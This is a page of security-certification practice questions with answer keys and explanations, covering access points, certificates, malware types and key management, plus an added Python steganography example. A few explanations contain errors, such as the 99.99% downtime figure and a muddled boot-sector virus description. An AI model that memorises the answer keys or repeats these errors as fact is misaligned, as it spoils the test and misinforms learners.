A contractor has been hired to conduct penetration testing on a company's network. They have decided to try to crack the passwords on a percentage of systems within the company. They plan to annotate the type of data that is on the systems that they can successfully crack to prove the ease of access to data. Evaluate the penetration steps and determine which are being utilized for this task. (Select all that apply.) A. Test security controls B. Bypass security controls C. Verify a threat exists D. Exploit vulnerabilities
A and D Two penetration test steps are being utilized by actively testing security controls and exploiting the vulnerabilities. Identifying weak passwords is actively testing security controls. In addition, exploiting vulnerabilities is being used by proving that a vulnerability is high risk. The list of critical data obtained will prove that the weak passwords can allow access to critical information. Bypassing security controls can be accomplished by going around controls that are already in place to gain access. Verifying that a threat exists would have consisted of using surveillance, social engineering, network scanners, and/or vulnerability assessment tools to identify vulnerabilities.
During a penetration test, an adversary operator sends an encrypted message embedded in an attached image. Analyze the scenario to determine what techniques the operator is relying on to hide the message. (Select all that apply.) A. Security by obscurity B. Integrity C. Prepending D. Confidentiality
A and D When used to conceal information, steganography amounts to "security by obscurity," which on its own is usually deprecated. A message can be encrypted by some mechanism before being embedded in a covertext, which is what provides confidentiality; the hiding itself provides only concealment. Steganography can also provide integrity or non-repudiation; for example, it can show that something was printed on a particular device at a particular time, which could demonstrate that it is genuine or a fake, but that is not what the operator is relying on here. A phishing or hoax email can be made more convincing by using prepending. In an offensive sense, prepending means adding text that appears legitimate and to have been generated by the mail system, such as "MAILSAFE:PASSED."
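The embedding half of the technique described above, as an added example that is not part of the original page: a least-significant-bit scheme that hides a length-prefixed payload in the pixels of an 8-bit grayscale image and extracts it again. The image is a constructed gradient held as a flat list rather than a real file, and the payload bytes stand in for ciphertext produced by a proper cipher beforehand; the encryption step is not part of this block, which is why the block alone gives obscurity rather than confidentiality.

```python
"""LSB steganography in a constructed grayscale image (added example)."""
import struct


def bits_of(data):
    """Yield the bits of a byte string, most significant bit of each byte first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def embed(pixels, payload):
    """Return a copy of pixels with the length-prefixed payload written into the LSBs."""
    frame = struct.pack("!I", len(payload)) + payload
    if len(frame) * 8 > len(pixels):
        raise ValueError("covertext too small for payload")
    out = list(pixels)
    for i, bit in enumerate(bits_of(frame)):
        out[i] = (out[i] & 0xFE) | bit  # replace only the lowest bit
    return out


def extract(pixels):
    """Read the 4-byte length prefix, then that many payload bytes, from the LSBs."""
    def read_bytes(start_bit, count):
        out = bytearray()
        for n in range(count):
            byte = 0
            for k in range(8):
                byte = (byte << 1) | (pixels[start_bit + n * 8 + k] & 1)
            out.append(byte)
        return bytes(out)

    (length,) = struct.unpack("!I", read_bytes(0, 4))
    return read_bytes(32, length)


def max_pixel_change(original, stego):
    """LSB embedding never moves a pixel value by more than 1, which is why it is hard to see."""
    return max(abs(a - b) for a, b in zip(original, stego))


def demo():
    cover = [(i * 7) % 256 for i in range(64 * 64)]  # constructed 64x64 gradient
    payload = bytes(range(200, 216))                # constructed; stands in for ciphertext
    stego = embed(cover, payload)
    return extract(stego) == payload, max_pixel_change(cover, stego)


if __name__ == "__main__":
    print(demo())
```

Detection follows from the same property: in a natural image the LSB plane is noisy but correlated with the image, while a plane that carries a length prefix and ciphertext looks like uniform random bits, which statistical steganalysis picks up.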
Select the appropriate methods for packet capture. (Select all that apply.) A. Wireshark B. Packet analyzer C. Packet injection D. tcpdump
A and D Wireshark and tcpdump are packet sniffers. A sniffer is a tool that captures packets, or frames, moving over a network. Wireshark is an open source graphical packet capture and analysis utility that works with most operating systems; tcpdump is a command line packet capture utility for Linux and other Unix-like systems. A packet (protocol) analyzer works in conjunction with a sniffer to perform traffic analysis: it decodes a captured frame to reveal its contents in a readable format but does not itself capture packets. Packet injection involves sending forged or spoofed network traffic by inserting (injecting) frames into the network stream; packets are not captured with packet injection.
Compare the characteristics of a rogue Access Point (AP) in wireless networks to determine which statements correctly summarize their attributes. (Select all that apply.) A. An evil twin is a rogue AP, and an attacker can use a Denial of Service (DoS) to disconnect users from the legitimate AP and connect to the evil twin. B. Sometimes referred to as an evil twin, a rogue AP masquerading as a legitimate AP, may have a similar name to a legitimate AP. C. An attacker can set up a rogue AP with something as simple as a smartphone with tethering capabilities. D. A Denial of Service (DoS) will bypass authentication security (enabled on the AP), so it is important to regularly scan for rogue APs on the network.
A, B, and C A rogue AP masquerading as a legitimate one is an evil twin. An attacker can use a DoS, such as a stream of deauthentication frames, to knock users off the legitimate AP; when users try to reconnect, they could connect to the evil twin unknowingly. An attacker can also form an evil twin by giving the AP a similar name (SSID) to that of the legitimate AP; users may select it by mistake and enter their credentials, which the attacker captures. Rogue APs can be set up with something as basic as a smartphone with tethering capabilities. It is vital to periodically survey the site to detect rogue APs. A DoS does not bypass authentication security enabled on the AP: without knowing the details of the authentication method, the attacker cannot join the legitimate network. It is important to scan for rogue APs, but the ease of a DoS is not the reason for regular scans.
Which of the following are appropriate methods of media sanitization? (Select all that apply.) A. Use random data to overwrite data on each location of a hard drive. B. Reset a hard disk to its factory condition utilizing tools provided by the vendor. C. Degauss a hard drive using a machine with a powerful electromagnet. D. Degauss Compact Disks (CDs) using a machine with a powerful electromagnet.
A, B, and C Media sanitization makes data on media being decommissioned, including hard drives, flash drives, and tape, unrecoverable. Sanitization can be performed by overwriting old data at each location on the media with zeroes or a random pattern. A low-level format can be used to reset a disk to its factory condition; most disk vendors supply tools to reset a disk, often described as low-level format tools, with the same effect as disk wiping software. A magnetic disk can also be mechanically shredded or degaussed, exposing the disk to a powerful electromagnet; the machine is costly and renders the disk unusable, so it cannot be repurposed or resold. Note that overwriting is not reliable for solid-state drives, whose wear-leveling can leave data in blocks the overwrite never reaches; the vendor's secure erase or cryptographic erase command should be used instead. Optical media holds no magnetic domains, so degaussing a CD has no effect; discs cannot be reformatted and should be destroyed, for example with a CD shredder, before discarding.
Analyze the features of Microsoft's Information Rights Management (IRM) and choose the scenarios that accurately depict IRM. (Select all that apply.) A. File permissions are assigned based on the roles within a document. B. A document is emailed as an attachment, but cannot be printed by the receiver. C. A document does not allow screen capture in a web browser view. D. An email message cannot be forwarded to another employee.
A, B, and D A benefit of IRM is that file permissions can be assigned for different document roles, such as author, editor, or reviewer, and each role can be granted specific rights such as sending, printing, and editing. Printing and forwarding of documents can be restricted even when the document is sent as a file attachment, so a recipient of a forwarded document may still be unable to print it. Printing and forwarding of email messages can likewise be restricted. Microsoft's IRM helps prevent an authorized viewer from copying, pasting, modifying, and printing content for unauthorized use, but it cannot prevent screen captures when documents are viewed in a browser.
An authoritative server for a zone creates an RRset signed with a Zone Signing Key. Another server requests a secure record exchange and the authoritative server returns the package along with the public key. Evaluate the scenario to determine what the authoritative server is demonstrating in this situation. A. Domain Name System (DNS) B. DNS Security Extension C. DNS Footprinting D. Dynamic Host Configuration Protocol (DHCP)
B A DNS Security Extensions (DNSSEC) transaction is being described. The authoritative server for the zone creates a package of resource records (an RRset) signed with the private half of its Zone Signing Key. When another server requests a secure record exchange, the authoritative server returns the RRset, its signature (RRSIG), and the public key (DNSKEY), which the requester uses to verify the signature. The DNSKEY is itself trusted through a DS record in the parent zone, forming a chain of trust back to the root. DNS is a system for resolving host names and domain labels to IP addresses. DNS footprinting means obtaining information about a private network by using its DNS server to perform a zone transfer (all of the records in a domain) to a rogue DNS server. DHCP provides an automatic method for network address allocation.
An employee is working on a team to build a directory of systems they are installing in a classroom. The team is using the Lightweight Directory Access Protocol (LDAP) to update the X.500 directory. Utilizing the standards of an X.500 directory, which of the following distinguished names is the employee most likely to recommend? A. OU=Univ,DC=local,CN=user,CN=system1 B. CN=system1,CN=user,OU=Univ,DC=local C. CN=user,DC=local,OU=Univ,CN=system1 D. DC=system1,OU=Univ,CN=user,DC=local
B A distinguished name is a unique identifier for any given resource within an X.500-like directory and is made up of attribute=value pairs, separated by commas. The most specific attribute is listed first, and successive attributes become progressively broader. Also referred to as the relative distinguished name, the most specific attribute (in this case, system1) uniquely identifies the object within the context of the successive attribute values. The directory schema describes the types of attributes, what information they contain, and the way attributes define object types. Some of the attributes commonly used include Common Name (CN), Organizational Unit (OU), Organization (O), Country (C), and Domain Component (DC). In this scenario, CN=system1 is the Common Name, CN=user is the broader common name, OU=Univ is the Organizational Unit, and DC=local is the Domain Component. This goes in order from a specific system to the broadest Domain Component.
Compare and evaluate the various levels and types of security found within a Trusted OS (TOS) to deduce which scenario is an example of a hardware Root of Trust (RoT). A. A security system is designed to prevent a computer from being hijacked by a malicious operating system B. The boot metrics and operating system files are checked, and signatures verified at logon. C. Digital certificates, keys, and hashed passwords are maintained in hardware-based storage. D. The industry standard program code that is designed to operate the essential components of a system.
B A hardware RoT, or trust anchor, is a secure subsystem that can provide attestation. When a computer joins a network, it may submit a report to the NAC declaring valid OS files. The RoT scans the boot metrics and OS files to verify their signatures. A secure boot is a security system designed to prevent a computer from being hijacked by a malicious OS. A Trusted Platform Module (TPM) is a specification for hardware-based storage of digital certificates, keys, hashed passwords, and other user and platform identification information. The Basic Input/Output System (BIOS) provides an industry standard program code that operates the essential components of the PC and ensures that the design of each manufacturer's motherboard is PC compatible.
There are several types of security zones on a network. Analyze network activities to determine which of the following does NOT represent a security zone. A. DMZ B. Screened host C. Wireless D. Guest network
B A screened host is when a smaller network accesses the Internet using a dual-homed proxy/gateway server. A Demilitarized Zone (DMZ) is a protected but untrusted area (zone) between the Internet and the private network. Traffic from wireless networks might be less trusted than traffic from a cabled network. If unauthenticated open access points or authenticated guest Wi-Fi networks exist on the network, administrators should keep them isolated. A guest network is a zone that allows untrusted or semi-trusted hosts on the local network. Examples include publicly accessible computers or visitors bringing their own portable computing devices to the premises.
Management has reason to believe that someone internal to the organization is committing fraud. To confirm their suspicion, and to collect evidence, they need to set up a system to capture the events taking place. Evaluate which option will best fit the organization's needs. A. Honeynet B. Honeypot C. Exploitation framework D. Metasploit
B A system that is placed on the network with the intent of attracting attackers, or of detecting internal fraud, snooping, and malpractice, is called a honeypot. This system will be placed within the current network. An entire decoy network is called a honeynet. A honeynet can be an actual network or a simulated one. An exploitation framework is a means of running intrusive scanning: it takes the vulnerabilities identified by a scanner and launches scripts or software to attempt to exploit selected vulnerabilities. Metasploit is the best-known exploitation framework.
A website with many subdomains has been issued a web server certificate for domain validation. This certificate verifies the parent domain and all subdomains (to a single level). This certificate is also known as which of the following? A. SAN certificate B. Wildcard certificate C. Root certificate D. Code signing certificate
B A wildcard certificate with a field entry of a wildcard domain such as *.comptia.org means that the certificate issued to the parent domain will be accepted as valid for all subdomains (to a single level). A subject alternative name (SAN) certificate lists different identifiers, including domain names, which are specific for each certificate. This becomes a wildcard certificate when a wildcard domain is listed. The root certificate is the one that identifies the certificate authority (CA) itself. The root certificate is self-signed. A root certificate would normally use a key size of at least 2048 bits. A code signing certificate is issued to a software publisher by the CA. The publisher signs the executables or DLLs to guarantee the validity of a software application or browser plug-in.
A systems administrator is building a wireless network using WPA3 technology. Which of the following would NOT be considered a main feature of WPA3? A. Simultaneous authentication of equals B. RC4 stream cipher with TKIP C. Management protection frames D. Enhanced open
B Among several main features of WPA3, Simultaneous Authentication of Equals (SAE) replaces WPA's 4-way handshake authentication and association mechanism with a protocol based on Diffie-Hellman key agreement. Version 1 of WPA uses the RC4 stream cipher but adds a mechanism called the Temporal Key Integrity Protocol (TKIP) to make it stronger. WPA3 mandates the use of management protection frames to protect against key recovery attacks; this is one of several features that make WPA3 a more secure solution for Wi-Fi networks. Enhanced Open enables encryption for the open authentication method.
Consider the types of zones within a network's topology and locate the zone considered semi-trusted and requires hosts to authenticate to join. A. Private network B. Extranet C. Internet D. Anonymous
B An extranet zone is a network of semi-trusted hosts, typically representing business partners, suppliers, or customers. Hosts must authenticate to join the extranet. A private network (intranet) is a network of trusted hosts owned and controlled by the organization. This type of trusted host network is under administrative control and subject to the security mechanisms set up to defend the network. Internet, or guest, zones permit anonymous access by untrusted hosts over the Internet. This can also be a mix of anonymous and authenticated access. Anonymous is not a zone but is a part of the Internet or guest zones.
Analyze each scenario and determine which best describes the authentication process in an Identity and Access Management (IAM) system. A. An account is created that identifies a user on the network. B. A user logs into a system using a control access card (CAC) and PIN number. C. An Access Control List (ACL) is updated to allow a new user access to only the databases that are required to perform their job. D. A report is reviewed that shows every successful and unsuccessful login attempt on a server.
B Authentication proves that a subject is who or what it claims to be when it attempts to access the resource. A CAC and PIN login is an example of authentication. Creating an account or ID that identifies the user, device, or process on the network defines identification. Authorization determines what rights subjects should have on each resource and enforces those rights. A company employee may need network access but will likely not need access to every resource, and limiting access limits a company's risk. Accounting tracks authorized usage of a resource or use of rights by a subject and alerts when unauthorized use is detected or attempted. Reports and audit logs account for who and what has been accessing network resources.
Biometric authentication methods have different error rates, with some methods being easier to fool than others. An unauthorized user is unlikely to fool which of the following methods? A. Fingerprint scan B. Retinal scan C. Facial recognition D. Voice recognition
B Biometric authentication based on a retinal scan is the hardest method to fool. Retinal scanning is used to identify the patterns of blood vessels within the eye, whereas an iris scan only uses the surface of the eye. It is possible to obtain a copy of a user's fingerprint and create a mold of it that will fool a fingerprint scanner. Facial recognition suffers from relatively high false acceptance and rejection rates, and as a result is vulnerable to spoofing. Voice recognition is subject to impersonation. It is also sensitive to background noise and other environmental factors which can interfere with authentication.
A system administrator has just entered their credentials to enter a secure server room. As the administrator is entering the door, someone is walking up to the door with their hands full of equipment and appears to be struggling to move items around while searching for their credentials. The system administrator quickly begins to assist by getting items out of the person's hands, and they walk into the room together. This person is not an employee, but someone attempting to gain unauthorized access to the server room. What type of social engineering has occurred? A. Familiarity/liking B. Consensus/social proof C. Authority and intimidation D. Identity fraud
B Consensus/social proof revolves around the belief that without an explicit instruction to behave in a certain way, people will follow social norms. It is typically polite to assist someone with their hands full. Familiarity/Liking is when an attacker uses charisma to persuade others to do as requested. They downplay their requests to make it seem like their request is not out of the ordinary. Authority and Intimidation can be used by an attacker by pretending to be someone senior. The person receiving the request would feel the need to take action quickly and without questioning the attacker. Identity fraud is a specific type of impersonation where the attacker uses specific details (such as personal information) of someone's identity.
Compare and contrast the modes of operation for block ciphers. Which of the following statements is true? A. ECB and CBC modes allow block ciphers to behave like stream ciphers. B. CTM mode allows block ciphers to behave like stream ciphers. C. ECB allows block ciphers to behave like stream ciphers. D. CBC and CTM modes allow block ciphers to behave like stream ciphers.
B Counter Mode (CTM) combines each block with a counter value. This allows each block to be processed individually and in parallel, improving performance, and allows block ciphers to behave like stream ciphers, which are faster than block ciphers. Electronic Code Book (ECB) mode applies the same key to each plaintext block, which means identical plaintext blocks can output identical ciphertexts. This is not how a stream cipher behaves. Cipher Block Chaining (CBC) mode applies an Initialization Vector (IV) to the first plaintext block to ensure that the key produces a unique ciphertext from any given plaintext, and repeats this as a "chain." This is not how a stream cipher behaves.
Which statement most accurately describes the mechanisms by which blockchain ensures information integrity and availability? A. Blockchain ensures availability by cryptographically linking blocks of information, and integrity through decentralization. B. Blockchain ensures availability through decentralization, and integrity through cryptographic hashing and timestamping. C. Blockchain ensures availability through cryptographic hashing and timestamping, and integrity through decentralization. D. Blockchain ensures both availability and integrity through decentralization and peer-to-peer (P2P) networking.
B The blockchain ledger is decentralized and distributed across a peer-to-peer (P2P) network to mitigate the risks of a single point of failure or compromise. Each block in a blockchain validates the hash of the previous block, all the way through to the beginning of the chain, ensuring that each historical transaction has not been tampered with. Blockchain is open. It may ensure the integrity and transparency of financial transactions, among other potential applications. Each block typically includes a timestamp of transactions, as well as the data involved in the transactions themselves, helping ensure data integrity. One of the most important characteristics of a blockchain is decentralization. Being distributed across a peer-to-peer (P2P) network ensures availability, but integrity is achieved through cryptographic hashing and timestamping.
A user would like to install an application on a mobile device that is not authorized by the vendor. The user decides the best way to accomplish the install is to perform rooting on the device. Compare methods for obtaining access to conclude which type of device the user has, and what actions the user has taken. A. The user has an iOS device and has used custom firmware to gain access to the administrator account. B. The user has an Android device and has used custom firmware to gain access to the administrator account. C. The user has an iOS device and has booted the device with a patched kernel. D. The user has an Android device and has booted the device with a patched kernel.
B Rooting is a term associated with Android devices. Some vendors provide authorized mechanisms for users to access the root account on their device. For some devices, it is necessary to exploit a vulnerability or use custom firmware. A user who has an iOS device and wants access to the administrator account will perform an action called jailbreaking versus rooting. If the user had an iOS device, and has booted the device with a patched kernel, the term would have been jailbreaking. An Android device is not able to be booted with a patched kernel. Custom firmware or access from the vendor is required to obtain administrator access.
A security team desires to modify event logging for several network devices. One team member suggests using the configuration files from the current logging system with another open format that uses TCP with a secure connection. Which format does the team member suggest? A. Syslog-ng B. Rsyslog C. Syslog D. NXlog
B Rsyslog can work over TCP and use a secure connection. It uses the same configuration file syntax as Syslog. Rsyslog can use more types of filter expressions in its configuration file to customize message handling. Syslog-ng is an update to Syslog that can use TCP secure communications, but it uses a different configuration file syntax than Syslog. Syslog provides an open format, protocol, and server software for logging event messages. A very wide range of host types use Syslog, as well as UDP for communications. NXlog is an open-source log normalization tool. One common use for it is to collect Windows logs, which use an XML-based format and then normalize them to a standard syslog format.
Given knowledge of secure firmware implementation, select the statement that describes the difference between secure boot and measured boot. A. Secure boot requires a unified extensible firmware interface (UEFI) and trusted platform module (TPM), but measured boot requires only a unified extensible firmware interface (UEFI). B. Secure boot provisions certificates for trusted operating systems (OSes) and blocks unauthorized OSes. Measured boot stores and compares hashes of critical boot files to detect the presence of unauthorized processes. C. Secure boot is the process of sending a signed boot log or report to a remote server, while measured boot provisions certificates for trusted operating systems (OSes) and blocks unauthorized OSes. D. Secure boot requires a unified extensible firmware interface (UEFI) but does not require a trusted platform module (TPM). Measured boot is the mechanism by which a system sends signed boot log or report to a remote server.
B Secure boot is about provisioning certificates for trusted operating systems and blocking unauthorized OSes. Measured boot stores and compares hashes of critical boot files to detect unauthorized processes. Secure boot requires UEFI but does not require a TPM. A trusted or measured boot process uses platform configuration registers (PCRs) in the TPM at each stage in the boot process to check whether hashes of key system state data have changed. Attestation is the process of sending a signed boot log or report to a remote server. Secure boot prevents the use of a boot loader or kernel that has been changed by malware (or an OS installed without authorization).
An employee has requested a digital certificate for a user to access the Virtual Private Network (VPN). It is discovered that the certificate is also being used for digitally signing emails. Evaluate the possible extension attributes to determine which should be modified so that the certificate only works for VPN access. A. Valid from/to B. Extended key usage C. Serial number D. Public key
B Set the Extended Key Usage (EKU) field of a certificate to define its usage. Applications such as virtual private network (VPN) or email clients may have specific requirements for key usage configuration. The validity field displays the date and time during which the certificate is valid. Certificates are issued with a limited duration, as set by the certificate authority (CA) policy for the certificate type. The serial number is a number uniquely identifying the certificate within the domain of its CA. This prevents a CA from generating duplicate certificates. The public key field displays the public key and algorithm used by the certificate holder. This key can be shared with other clients and users on the public network.
Transport layer security (TLS) version 1.3 improves upon a vulnerability in TLS1.2. Which statement correctly describes a remedy for this vulnerability? A. TLS version 1.3 is backward compatible with earlier versions of transport layer security. B. TLS version 1.3 removes the ability to downgrade to weaker encryption ciphers and earlier versions of transport layer security. C. TLS version 1.3 creates a secure link between the client and server using Secure Shell (SSH) over TCP port 22. D. TLS1.3 can use more secure authentication and authorization methods, such as security assertion markup language (SAML) and open authorization (OAuth).
B TLS 1.3 removes the ability to perform downgrade attacks by preventing the use of insecure features and algorithms from previous versions. Configuring a TLS 1.2 server allows clients to downgrade to TLS 1.1 or 1.0 or SSL 3.0 if they do not support TLS 1.2. A man-in-the-middle can use a downgrade attack to try to force the use of a weak cipher suite and secure sockets layer (SSL)/TLS version. Secure shell file transfer protocol (SFTP) addresses the privacy and integrity issues of FTP by encrypting the authentication and data transfer between client and server. The Open Authorization (OAuth) protocol is a standard for federated identity management to consider for secure application programming interfaces (APIs), not a TLS 1.3 feature.
A critical server has a high availability requirement of 99.99%. What would be a tolerable downtime based on this requirement? A. 0:53:56 annual downtime B. 0:49:23 annual downtime C. 1:24:19 annual downtime D. 2:48:42 annual downtime
B The Maximum Tolerable Downtime (MTD) metric states the requirement for a particular business function. High availability is usually described as 24x7. For a critical system, availability will be described from 99% to 99.9999%. In this scenario, the requirement is 99.99%, resulting in the maximum downtime of 00:52:09. Since 00:49:23 is less downtime than the maximum requirement, this results in the system meeting the requirement. A downtime of 00:53:56 is more than the maximum annual downtime of 00:52:09. As a result, it is outside of the MTD. A downtime of 01:24:19 is more than the maximum annual downtime of 00:52:09. As a result, it is outside of the MTD. A downtime of 02:48:42 is more than the maximum annual downtime of 00:52:09. As a result, it is outside of the MTD.
An employee is working on a project that contains critical data for the company. In order to meet deadlines, the employee decides to email the document containing the data to their personal email to work on at home. Consider the traits of Data Loss Prevention (DLP) and evaluate the scenario to select the DLP remediation the company should utilize. A. The email is allowed to send the file and an alert is triggered so that an administrator is aware of the incident. B. The user should be blocked from sending the email but retain access to it. The user is alerted to the policy violation, and it is logged as an incident. C. Access is denied to the sender and all other users within the company. The file is encrypted and moved into a quarantine area by the management engine. D. The original file is quarantined and replaced with one describing the policy violation and how the user can release it again.
B The best solution for the company in this scenario is to block the email from sending the file to the personal email account. This action protects the data and notifies the user of the policy violation. It is likely that user training is needed so that the employee is aware of the policy and the reasons why the policy is in place. If an alert-only remediation is used for this scenario, the data is in danger of being compromised. A personal email account will not provide protection and will be vulnerable to attack. This action is not in the best interest of the company. Quarantine will prohibit employees from accessing the file and will reduce work output. The policy violation was not malicious and the intent was not to harm the company. The tombstone remediation technique is one step further than quarantine and is also not conducive to the workflow of the company. The block technique will still create the alert, notify administrators, and allow for retraining the employee without stopping workflow.
Pilots in an Air Force unit utilize government-issued tablet devices loaded with navigational charts and aviation publications, with all other applications disabled. This illustrates which type of mobile device deployment? A. BYOD B. COBO C. COPE D. CYOD
B The company owns the device and dictates the device's purpose in the corporate owned, business only (COBO) model. Employees own their own devices that meet business configuration standards and run corporate applications in the bring your own device (BYOD) model. Businesses may oversee and audit user-owned devices to some extent, but this model poses significant security challenges. In the corporate owned, personally-enabled (COPE) model, the company chooses, supplies, and owns the device, but authorizes personal use (subject to acceptable use policies). With choose your own device (CYOD), the company owns and supplies the device, but the employee chooses it.
A company utilizing formal data governance assigns the role of data steward to an employee. Evaluate the roles within data governance and conclude which tasks the employee in this role performs. A. The employee ensures the processing and disclosure of Personally Identifiable Information (PII) complies within legal frameworks. B. The employee ensures data is labeled and identified with appropriate metadata. C. The employee enforces access control, encryption, and recovery measures. D. The employee ensures the data is protected with appropriate controls and determines who should have access.
B The data steward is primarily responsible for data quality. This involves tasks such as ensuring data is labeled and identified with appropriate metadata, and data is collected and stored in a format with values that comply with applicable laws and regulations. A privacy officer is responsible for oversight of any Personally Identifiable Information (PII) assets managed by the company. This includes ensuring that the processing and disclosure of PII comply with legal and regulatory frameworks. The data custodian is responsible for managing the system where data assets are stored. This includes responsibility for enforcing access control, encryption, and recovery measures. The data owner is a senior role with ultimate responsibility for maintaining the confidentiality, integrity, and availability of the information asset. The owner is responsible for labeling the asset and ensuring it is protected with appropriate controls.
A hurricane has affected a company in Florida. What is the first step in the order of restoration? A. Enable and test switch infrastructure B. Enable and test power delivery systems C. Enable and test network security appliances D. Enable and test critical network servers
B The first step in the order of restoration is to enable and test power delivery systems such as grid power, Power Distribution Units (PDUs), and secondary generators. The second step in the order of restoration is to enable and test switch infrastructure, followed by routing appliances and systems. The third step in the order of restoration is to enable and test network security appliances, such as firewalls and proxies. The fourth step in the order of restoration is to enable and test critical network servers, such as directory services. The back-end and middleware will be next, followed by the front-end. The final step is to enable client workstations and devices.
An employee handles key management and has learned that a user has used the same key pair for encrypting documents and digitally signing emails. Prioritize all actions that should be taken and determine the first action that the employee should take. A. Revoke the keys. B. Recover the encrypted data. C. Generate a new key pair. D. Generate a new certificate.
B The first step is to recover any data encrypted with the key so the data can be decrypted. Once the data is recovered, the key can be revoked and an administrator can issue a new key pair. After the data has been recovered, the keys should be revoked. They are compromised and should not be used for any future tasks. After the compromised keys are revoked, the user can be issued new keys. The user requires two sets of keys, one for encrypting messages and the other for digitally signing documents. Certificate generation is used to identify the public part of a key pair as belonging to a subject and will occur after the user's new keys have been generated.
Select the example that provides an accurate simulation of a company engaging in the identifying threats phase of risk management. A. A company develops a list of processes that are necessary for the company to operate. B. A company conducts research to determine which vulnerabilities may be exploited. C. A company conducts penetration testing to search for vulnerabilities. D. A company determines how the company will be affected in the event a vulnerability is exploited.
B The third phase of risk management is to identify threats: anything that may take advantage of, exploit, or accidentally trigger vulnerabilities. Threat refers to the sources or motivations of people and things that could cause loss or damage. The first phase of risk management is to identify mission essential functions. Mitigating risk can involve a large amount of expenditure, so it is important to focus efforts. Part of risk management is to analyze workflows and identify the mission essential functions that could cause the whole business to fail if they are not performed. The second phase of risk management is to identify vulnerabilities for each function or workflow. This includes analyzing systems and assets to discover and list any vulnerabilities or weaknesses to which they may be susceptible. The fourth phase of risk management is to analyze business impacts: the likelihood of a vulnerability being activated as a security incident by a threat and the impact of that incident on critical systems.
A system administrator has configured a security log to record unexpected behavior and review the logs for suspicious activity. Consider various types of audits to determine which type aligns with this activity. A. Permission auditing B. Usage auditing C. Information security audit D. Compliance audit
B Usage auditing refers to configuring the security log to record key indicators and then reviewing the logs for suspicious activity. Behavior recorded by event logs that differs from expected behavior may indicate everything from a minor security infraction to a major incident. The systems administrator puts in place permission auditing to review privileges regularly. This includes monitoring group membership and access control lists for each resource plus identifying and disabling unnecessary accounts. An information security audit measures how the organization's security policy is employed and determines how secure the network or site is that is being audited. A compliance audit reviews a company's policies and procedures and determines if it is in compliance with regulatory guidelines.
Consider the life cycle of an encryption key. Which of the following is NOT a stage in a key's life cycle? A. Storage B. Verification C. Expiration and renewal D. Revocation
B Verification is not a stage in a key's life cycle. It is part of the software development life cycle. The stages are: key generation, certificate generation, storage, revocation, and expiration and renewal. Storage is the stage where a user must take steps to store the private key securely. It is also important to ensure that the private key is not lost or damaged. The expiration and renewal stage addresses that a key pair expires after a certain period. Giving the key a "shelf-life" increases security. Certificates can be renewed with new key material. Revocation is the stage that concerns itself with the event of a private key being compromised; it can be revoked before it expires.
Assess the features and processes within biometric authentication to determine which scenario is accurate. A. A company chooses to use a retinal scanner as it is less intrusive than iris scanners. B. A company uses a fingerprint scanner as it is the most widely used biometric authentication method. C. A company uses a fingerprint scanner as it is more expensive but has a straightforward process. D. A company records information from a sample using a sensor module.
B When considering the various tools used for biometric authentication, fingerprint recognition is the most widely implemented biometric authentication method. Contrary to option A, iris scanning is less intrusive than retinal scanning and matches patterns on the surface of the eye using near-infrared imaging. Contrary to option C, the technology required for scanning and recording fingerprints is relatively inexpensive and the process is quite straightforward. A sensor module acquires the biometric sample from the target but is not a biometric authentication tool itself.
Which of the following solutions best addresses data availability concerns that may arise with the use of application-aware next-generation firewalls (NGFW) and unified threat management (UTM) solutions? A. Signature-based detection system B. Secure web gateway (SWG) C. Network-based intrusion prevention system (IPS) D. Active or passive test access point (TAP)
B While complex NGFW and UTM solutions provide high confidentiality and integrity, lower throughput reduces availability. One solution to this is to treat security solutions for server traffic differently from that for user traffic. An SWG acts as a content filter, which applies user-focused filtering rules and also conducts threat analysis. A signature-based detection (or pattern-matching) engine is loaded with a database of attack patterns or signatures. If traffic matches a pattern, then the engine generates an incident. Intrusion prevention systems (IPS), positioned like firewalls at borders between network zones, provide an active response to network threats. A TAP is a hardware device inserted into a cable to copy frames for analysis.
A user's PC is infected with a virus that appears to be memory resident and loads anytime it is booted from an external universal serial bus (USB) thumb drive. Examine the following options and determine which describes the infection type. A. Script virus B. Boot virus C. Worm D. Spyware
B With a boot virus, code is written to the disk boot sector or the partition table of a fixed disk or USB media. The code executes as a memory resident process when the OS starts. Script and macro viruses use the programming features available in local scripting engines for the OS and/or browser, such as PowerShell. A computer worm is memory-resident malware that can run without user intervention and replicate over network resources. Spyware is malware that can perform adware-like tracking, but also monitor local application activity, take screenshots, and activate recording devices.
If not managed properly, certificate and key management can represent a critical vulnerability. Assess the following statements about key management and select the true statements. (Select all that apply.) A. If a key used for signing and encryption is compromised, it can be easily destroyed with a new key issued. B. It is exponentially more difficult to ensure the key is not compromised with multiple backups of a private key. C. If a private key, or secret key, is not backed up, the storage system represents a single point of failure. D. A compromised private key that encrypts data is of no concern if the same key signs documents.
B and C A problem with key storage is the difficulty associated with multiple backups of a private key. It is exponentially more difficult to ensure the key is not compromised in this situation. If a key is not backed up, it represents a single point of failure. Key recovery is a process for backing up keys and/or recovering data encrypted with a lost key. If a key is compromised and is used for signing only, it can be destroyed, and a new key issued. A key used for encryption cannot be destroyed so easily. The encrypted data has to be recovered first. If the private key used to both encrypt and sign a document is compromised, both uses of the key are of great security risk and may provide external threats more access to private data.
An employee calls IT personnel and states that they received an email with a PDF document to review. After the PDF was opened, the system has not been performing correctly. An IT admin conducted a scan and found a virus. Determine the two classes of viruses the computer most likely has. (Select all that apply.) A. Boot sector B. Macro C. Script D. Non-resident
B and C Both a macro and script virus can use a PDF as a vector. The user stated that a PDF file was recently opened. A macro virus is executed when an application is executed. Executable objects can also be embedded or attached within other file types such as Microsoft Word and Rich Text Format. A script virus typically targets vulnerabilities in an interpreter. Scripts are powerful languages used to automate operating system functions and add interactivity to web pages and are executed by an interpreter rather than self-executing. PDF documents have become a popular vector for script viruses. A boot sector virus is one that attacks the disk boot sector information, the partition table, and sometimes the file system. The virus is contained within a host executable file and runs with the host process. The virus will try to infect other process images on persistent storage and perform other payload actions.
A new cloud-based application will replicate its data on a global scale, but will exclude residents of the European Union. Which concerns should the organization that provides the data to consumers take into consideration? (Select all that apply.) A. General Data Protection Regulations (GDPR) B. Sovereignty C. Data Location D. Roles
B and C Data sovereignty refers to a jurisdiction preventing or restricting processing and storage from taking place on systems that do not physically reside within that jurisdiction. Storage locations might have to be carefully selected to mitigate data sovereignty issues. Most cloud providers allow a choice of data centers for processing and storage. GDPR protections extend to any EU citizen while they are within EU or EEA (European Economic Area) borders. There are important institutional governance roles for oversight and management of information assets within a data life cycle. These roles help to manage and maintain data.
